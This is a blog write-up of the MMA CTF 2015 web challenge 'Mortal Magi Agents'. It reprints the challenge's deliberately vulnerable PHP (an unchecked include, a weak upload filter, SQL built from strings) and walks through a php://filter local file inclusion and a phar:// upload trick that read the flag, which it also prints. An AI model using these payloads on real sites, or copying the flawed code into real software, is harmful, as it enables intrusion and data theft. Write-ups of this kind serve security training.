shpik's world!

[Web] Mortal Magi Agents - 300pts

0x400 CTF/0x401 MMA 1st 2015


Problem

http://magiagents.chal.mmactf.link/

Flag

#Your ScoreScoreTeams
1300300

77


This problem is LFI vulnerable.


Problem Page [ http://magiagents.chal.mmactf.link/ ]



'indxe.php?page=settings' is vulnerable point.

file upload is settings page.


First I got a php source.


http://magiagents.chal.mmactf.link/index.php?page=php://filter/convert.base64-encode/resource=home

// home.php


// index.php
<?php
session_start();

if (!isset($_GET["page"]) || isset($page))
    $page = "home";
else
    $page = $_GET["page"];
?>
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <!-- The above 3 meta tags *must* come first in the head; any other head content must come *after* these tags -->
    <meta name="description" content="">
    <meta name="author" content="">
    <link rel="icon" href="favicon.ico">

    <title>Mortal Magi Agents</title>

    <!-- Bootstrap core CSS -->
    <link href="css/bootstrap.min.css" rel="stylesheet">

    <!-- Custom styles for this template -->
    <link href="css/jumbotron.css" rel="stylesheet">

    <!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries -->
    <!--[if lt IE 9]>
      <script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
      <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
    <![endif]-->
  </head>

  <body>

    <nav class="navbar navbar-inverse navbar-fixed-top">
      <div class="container">
        <div class="navbar-header">
          <button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar">
            <span class="sr-only">Toggle navigation</span>
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
            <span class="icon-bar"></span>
          </button>
          <a class="navbar-brand" href="index.php">Mortal Magi Agents</a>
        </div>
        <div id="navbar" class="collapse navbar-collapse">
          <ul class="nav navbar-nav">
            <li class="active"><a href="?page=home">Home</a></li>
            <li><a href="?page=news">News</a></li>
            <li><a href="#contact">Contact</a></li>
          </ul>
<?php if (isset($_SESSION["user"])) { ?>
          <ul class="nav navbar-nav navbar-right">
            <li class='dropdown'>
              <a href="#" aria-expanded="false" class="dropdown-toggle" data-toggle="dropdown" role="button">
              <?php
              if (isset($_SESSION["avator"])) {
                  echo '<img src="'.$_SESSION['avator'].'" width="32" height="32">';
              }
              echo $_SESSION["user"];
              ?><span class='caret'></span></a>
              <ul class='dropdown-menu' role='menu'>
              <li><a href="?page=settings">Settings</a></li>
              <li><a href="logout.php">Sign out</a></li>
              </ul>
            </li>
          </ul>
<?php } else { ?>
          <form class="navbar-form navbar-right" action="login.php" method="post">
            <div class="form-group">
              <input type="text" placeholder="User" class="form-control" name="user">
            </div>
            <div class="form-group">
              <input type="password" placeholder="Password" class="form-control" name="password">
            </div>
            <button type="submit" class="btn btn-success" name="signin">Sign in</button>
            <button type="submit" class="btn btn-danger" name="signup">Sign up</button>
          </form>
<?php } ?>
        </div><!--/.nav-collapse -->
      </div>
    </nav>

    <!-- Main jumbotron for a primary marketing message or call to action -->
    <!--
    <div class="jumbotron">
    </div>
    -->
    <div class="container">
<?php
include("$page.php");
?>
      </div>


      <hr>

      <footer>
        <p>Mortal Magi Agents 2015</p>
      </footer>
    </div> <!-- /container -->


    <!-- Bootstrap core JavaScript
    ================================================== -->
    <!-- Placed at the end of the document so the pages load faster -->
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
    <script src="js/bootstrap.min.js"></script>
  </body>
</html>


// settings.php
<?php
require "./db.php";
if (isset($_FILES["file"])) {
    if ($_FILES['file']['type'] == "image/jpeg") {
        $ext = ".jpg";
    }
    else if ($_FILES['file']['type'] == "image/gif") {
        $ext = ".gif";
    }
    else if ($_FILES['file']['type'] == "image/png") {
        $ext = ".png";
    }
    $filename = "avators/" . $_SESSION["user"] . sha1_file($_FILES['file']['tmp_name']) . $ext;
    move_uploaded_file($_FILES['file']['tmp_name'], $filename);
    
    $_SESSION["avator"] = $filename;
    $db = connect_db();
    $db->query("UPDATE users SET avator = '$filename' WHERE name = '".$_SESSION['user']."'");
}
?>
<div class="page-header"><h1>Settings</h1></div>
<h2>Avator</h2>
<?php
if (isset($_SESSION["avator"])) {
?>
<img src="<?php echo $_SESSION['avator']; ?>" width="64" height="64">
<?php
}
?>
<h3>New avator</h3>
<form method="POST" enctype="multipart/form-data">
<input type="file" name="file">
<input type="submit">
</form>



upload file name is 'user'+sha1(filename)

but, this name is no problem.


i used phar://


getflag.php

<?php echo file_get_contents('../flag');?>


http://magiagents.chal.mmactf.link/?page=phar:///var/www/html/avators/afafafb347d0cf8bd02e7ddd7c018e74fa336beff2b0b5.jpg/getflag


MMA{5ded4df85bb8785f9cff08268703278c4e18e3fd}


Good

Flag is MMA{5ded4df85bb8785f9cff08268703278c4e18e3fd}


'0x400 CTF > 0x401 MMA 1st 2015' 카테고리의 다른 글

[Crypto] Twin Prime - 50pts  (0) 2016.09.05
[Web] Global Page - 50pts  (0) 2016.09.05
[Web] Get the admin password! - 100pts  (0) 2016.09.05
[Web] Mortal Magi Agents - 300pts  (0) 2015.09.09
[Web] Login as admin! - 30pts  (0) 2015.09.08